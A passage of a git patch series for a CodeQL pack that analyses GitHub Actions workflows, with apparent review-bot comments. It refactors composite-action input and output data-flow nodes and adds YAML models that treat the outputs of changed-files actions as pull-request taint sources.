identification of Composite Actions input and output nodes --- ql/lib/codeql/actions/Ast.qll | 10 ++++++-- .../dataflow/internal/DataFlowPublic.qll | 25 +++++++++---------- .../CWE-020/CompositeActionSummaries.ql | 10 ++++---- .../CWE-020/CompositeActionsSources.ql | 13 +++++----- 4 files changed, 31 insertions(+), 27 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c7573dfb839..6307897685f 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -92,7 +92,8 @@ class OutputsStmt extends Statement instanceof YamlMapping { * Gets a specific output expression (YamlMapping) by name. */ OutputExpr getOutputExpr(string name) { - this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result + this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or + this.(YamlMapping).lookup(name) = result } } @@ -101,7 +102,12 @@ class InputExpr extends Expression instanceof YamlString { } class OutputExpr extends Expression instanceof YamlString { - OutputExpr() { exists(OutputsStmt outputs | outputs.(YamlMapping).maps(_, this)) } + OutputExpr() { + exists(OutputsStmt outputs | + outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or + outputs.(YamlMapping).lookup(_) = this + ) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index d83608dc2b8..0204015ac22 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
@@ -48,22 +48,22 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr parameter; + private InputExpr input; ParameterNode() { - this.asExpr() = parameter and - parameter = any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(_) + this.asExpr() = input and + input = any(InputsStmt s).getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) + input = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) } - override string toString() { result = parameter.toString() } + override string toString() { result = "input " + input.toString() } - override Location getLocation() { result = parameter.getLocation() } + override Location getLocation() { result = input.getLocation() } - InputExpr getInputExpr() { result = parameter } + InputExpr getInputExpr() { result = input } } /** @@ -83,19 +83,18 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private Cfg::Node node; + private OutputExpr output; ReturnNode() { - this.getCfgNode() = node and - (node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) or - node.getAstNode() = any(CompositeActionStmt a).getOutputsStmt().getOutputExpr(_)) + this.asExpr() = output and + output = any(OutputsStmt s).getOutputExpr(_) } ReturnKind getKind() { result = TNormalReturn() } - override string toString() { result = "return " + node.toString() } + override string toString() { result = "output " + output.toString() } - override Location getLocation() { result = node.getLocation() } + override Location getLocation() { result = output.getLocation() } } /** Gets the node corresponding to `e`. */ diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 46a7797e2b2..00a70eeed2f 100644 
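Review bot: `ParameterNode` now accepts `any(InputsStmt s).getInputExpr(_)`, but `isParameterOf` still only matches `c.(ReusableWorkflowStmt)`. Composite-action inputs therefore become parameter nodes that belong to no callable and have no position, and the data-flow library cannot bind arguments to them. Adding the second disjunct keeps the two in step: `or input = c.(CompositeActionStmt).getInputsStmt().getInputExpr(pos)`. The doc comments on both classes still say "Reusable workflow input nodes" and "Reusable workflow output nodes" and should mention composite actions. `ReturnNode` in the following hunk likewise ranges over every `OutputsStmt`, so any mapping the broad `OutputsStmt` predicate accepts becomes a return node.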
--- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -15,16 +15,16 @@ import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class OutputVariableSink extends DataFlow::Node { - OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { + source instanceof DataFlow::ParameterNode and exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof DataFlow::ReturnNode and + exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 09556ac1b78..f67811b3f5f 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql 
@@ -15,18 +15,17 @@ import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class OutputVariableSink extends DataFlow::Node { - OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) and - not exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + not source instanceof DataFlow::ParameterNode and + exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof DataFlow::ReturnNode and + exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } } module MyFlow = TaintTracking::Global; From 68901e252c70cba0add42f17a7074fa29b17f37c Mon Sep 17 00:00:00 2001 
From: jorgectf Date: Tue, 13 Feb 2024 13:18:52 +0100 Subject: [PATCH 0025/1267] Add some changed-files sources --- .../codeql/actions/dataflow/ExternalFlow.qll | 2 +- ql/lib/ext/REMOVEME.model.yml | 6 --- .../ext/ahmadnassri_action-changed-files.yml | 9 +++++ ql/lib/ext/dorny_paths-filter.yml | 7 ++++ ...> frabert_replace-string-action.model.yml} | 0 ql/lib/ext/jitterbit_get-changed-files.yml | 19 +++++++++ ...actions-find-and-replace-string.model.yml} | 4 +- ql/lib/ext/tj-actions-changed-files.model.yml | 28 ------------- ql/lib/ext/tj-actions_changed-files.model.yml | 39 +++++++++++++++++++ .../ext/tj-actions_verify-changed-files.yml | 7 ++++ 10 files changed, 83 insertions(+), 38 deletions(-) delete mode 100644 ql/lib/ext/REMOVEME.model.yml create mode 100644 ql/lib/ext/ahmadnassri_action-changed-files.yml create mode 100644 ql/lib/ext/dorny_paths-filter.yml rename ql/lib/ext/{frabert-replace-string-action.model.yml => frabert_replace-string-action.model.yml} (100%) create mode 100644 ql/lib/ext/jitterbit_get-changed-files.yml rename ql/lib/ext/{mad9000-actions-find-and-replace-string.model.yml => mad9000_actions-find-and-replace-string.model.yml} (56%) delete mode 100644 ql/lib/ext/tj-actions-changed-files.model.yml create mode 100644 ql/lib/ext/tj-actions_changed-files.model.yml create mode 100644 ql/lib/ext/tj-actions_verify-changed-files.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index b19fbcbaca6..402372300fb 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
@@ -22,7 +22,7 @@ predicate sinkModel(string action, string version, string input, string kind) { * Fields: * - action: Fully-qualified action name (NWO) * - version: Either '*' or a specific SHA/Tag - * - input arg: sink node (prefixed with either `env.` or `input.`) + * - input: sink node (prefixed with either `env.` or `input.`) * - kind: sink kind */ predicate sinkNode(DataFlow::ExprNode sink, string kind) { diff --git a/ql/lib/ext/REMOVEME.model.yml b/ql/lib/ext/REMOVEME.model.yml deleted file mode 100644 index b21aa207bb2..00000000000 --- a/ql/lib/ext/REMOVEME.model.yml +++ /dev/null @@ -1,6 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sinkModel - data: - - [ "FAKE-mad9000/actions-find-and-replace-string", "*", "source", "expression-injection" ] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.yml new file mode 100644 index 00000000000..c5e4df09e3a --- /dev/null +++ b/ql/lib/ext/ahmadnassri_action-changed-files.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files" ] + - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files" ] + - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files" ] + - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files" ] diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.yml new file mode 100644 index 00000000000..c78e9e08e70 --- /dev/null +++ b/ql/lib/ext/dorny_paths-filter.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "dorny/paths-filter", "*", "changes", "pull_request", "PR changed files" ] + - [ "dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files" ] 
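Review bot: The new file `ahmadnassri_action-changed-files.yml` is added without the `.model.yml` suffix that the renamed files in this commit keep (`frabert_replace-string-action.model.yml`, `tj-actions_changed-files.model.yml`). The pack's data-extension glob is not shown on this page, but if it selects `ext/*.model.yml` these source models are never loaded and outputs of the modelled actions silently stop being treated as tainted. The same applies to `dorny_paths-filter.yml`, `jitterbit_get-changed-files.yml` and `tj-actions_verify-changed-files.yml`. Renaming them to `*.model.yml`, or adding a test that expects one source from each file, would catch this.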
diff --git a/ql/lib/ext/frabert-replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml similarity index 100% rename from ql/lib/ext/frabert-replace-string-action.model.yml rename to ql/lib/ext/frabert_replace-string-action.model.yml diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.yml new file mode 100644 index 00000000000..8d2798f3736 --- /dev/null +++ b/ql/lib/ext/jitterbit_get-changed-files.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files" ] \ No newline at end of file 
diff --git a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml similarity index 56% rename from ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml rename to ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 28517f44568..a9db2714746 100644 --- a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -4,6 +4,4 @@ extensions: extensible: summaryModel data: - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ] - - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] - - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] - - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] + - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml deleted file mode 100644 index a3f687a0611..00000000000 --- a/ql/lib/ext/tj-actions-changed-files.model.yml +++ /dev/null 
@@ -1,28 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sourceModel - data: - - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", 
"unmerged_files", "*", "PR changed files" ] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml new file mode 100644 index 00000000000..8e0189dcb67 --- /dev/null +++ b/ql/lib/ext/tj-actions_changed-files.model.yml 
@@ -0,0 +1,39 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - [ "tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files" ]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.yml
new file mode 100644
index 00000000000..55aebb0d34a
--- /dev/null
+++ b/ql/lib/ext/tj-actions_verify-changed-files.yml
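Review bot: The fourth column of every row narrows from `"*"` in the deleted file to `pull_request` / `pull_request_target`, so a workflow that runs `tj-actions/changed-files` under any other event no longer yields a source. If that column is the triggering event (inferred from its values), workflows that handle pull-request content under events such as `workflow_run` or `issue_comment` would go unreported. The six `any_*` / `only_*` outputs of the old list are dropped as well, which looks deliberate if they only carry booleans. I would record the decision at the top of the list, e.g. `# only pull_request and pull_request_target are modelled; other events are not treated as sources`, and add a test workflow for one of the excluded events so the gap is visible.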
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files" ]
From fa91837f63dbd6cd399066fa386c93b0bddd5309 Mon Sep 17 00:00:00 2001
From: jorgectf
Date: Tue, 13 Feb 2024 13:22:18 +0100
Subject: [PATCH 0026/1267] Trim yaml
---
 .../ext/ahmadnassri_action-changed-files.yml | 8 +--
 ql/lib/ext/dorny_paths-filter.yml | 4 +-
 .../frabert_replace-string-action.model.yml | 4 +-
 ql/lib/ext/jitterbit_get-changed-files.yml | 28 ++++----
 ..._actions-find-and-replace-string.model.yml | 4 +-
 ql/lib/ext/tj-actions_changed-files.model.yml | 68 +++++++++----------
 .../ext/tj-actions_verify-changed-files.yml | 4 +-
 7 files changed, 60 insertions(+), 60 deletions(-)
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.yml
index c5e4df09e3a..bd86b3f843e 100644
--- a/ql/lib/ext/ahmadnassri_action-changed-files.yml
+++ b/ql/lib/ext/ahmadnassri_action-changed-files.yml
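Review bot: Both rows name the output `changed-files`, but as far as I know `tj-actions/verify-changed-files` publishes its file list as `changed_files` (underscore), alongside the boolean `files_changed`. A row whose output name never matches produces no source and no error, so a workflow reading that output would silently go unmodelled. If this is confirmed against the action's `action.yml`, the rows should read `[ "tj-actions/verify-changed-files", "*", "changed_files", "pull_request", "PR changed files" ]` plus the `pull_request_target` twin. The same name is carried unchanged through the later whitespace and `output.` prefix commits on this page.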
@@ -3,7 +3,7 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files" ]
- - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files" ]
- - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files" ]
- - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files" ]
+ - ["ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.yml
index c78e9e08e70..c9cdd2dbcc0 100644
--- a/ql/lib/ext/dorny_paths-filter.yml
+++ b/ql/lib/ext/dorny_paths-filter.yml
@@ -3,5 +3,5 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - [ "dorny/paths-filter", "*", "changes", "pull_request", "PR changed files" ]
- - [ "dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files" ]
+ - ["dorny/paths-filter", "*", "changes", "pull_request", "PR changed files"]
+ - ["dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml
index e211fe2b69c..76ce81b394e 100644
--- a/ql/lib/ext/frabert_replace-string-action.model.yml
+++ b/ql/lib/ext/frabert_replace-string-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: codeql/actions-all
 extensible: summaryModel
 data:
- - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ]
- - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ]
+ - ["frabert/replace-string-action", "*", "string", "replaced", "taint"]
+ - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.yml
index 8d2798f3736..198e60d4245 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.yml
@@ -3,17 +3,17 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - [ "jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files" ]
\ No newline at end of file
+ - ["jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files"]
\ No newline at end of file
diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
index a9db2714746..46a577d2f7e 100644
--- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: codeql/actions-all
 extensible: summaryModel
 data:
- - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ]
- - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ]
\ No newline at end of file
+ - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"]
+ - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml
index 8e0189dcb67..1ef816727e1 100644
--- a/ql/lib/ext/tj-actions_changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_changed-files.model.yml
@@ -3,37 +3,37 @@ extensions:
 pack: codeql/actions-all
 extensible: sourceModel
 data:
- - [ "tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files" ]
\ No newline at end of file
+ - ["tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files"]
